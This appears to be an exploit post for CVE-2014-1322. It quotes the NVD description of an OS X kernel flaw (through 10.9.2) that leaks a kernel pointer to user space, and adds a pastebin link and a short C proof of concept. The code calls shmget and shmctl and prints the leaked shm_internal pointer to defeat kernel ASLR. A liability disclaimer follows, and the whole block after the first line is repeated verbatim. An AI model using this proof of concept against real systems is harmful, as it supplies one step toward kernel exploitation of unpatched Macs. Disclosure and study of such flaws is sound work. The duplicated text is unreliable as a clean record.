NVD decription http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1322
The kernel in Apple OS X through 10.9.2 places a kernel pointer into an XNU object data structure accessible from user space, which makes it easier for local users to bypass the ASLR protection mechanism by reading an unspecified attribute of the object.
and pastebin.com PoC link http://pastebin.com/8b7iStQb and below PoC
int shm = shmget( IPC_PRIVATE, 0x1337, SHM_R | SHM_W );
struct shmid_ds lolz;
int res = shmctl( shm, IPC_STAT, &lolz );
printf( "%p\n", lolz.shm_internal );
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise.Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
The kernel in Apple OS X through 10.9.2 places a kernel pointer into an XNU object data structure accessible from user space, which makes it easier for local users to bypass the ASLR protection mechanism by reading an unspecified attribute of the object.
and pastebin.com PoC link http://pastebin.com/8b7iStQb and below PoC
int shm = shmget( IPC_PRIVATE, 0x1337, SHM_R | SHM_W );
struct shmid_ds lolz;
int res = shmctl( shm, IPC_STAT, &lolz );
printf( "%p\n", lolz.shm_internal );
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise.Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information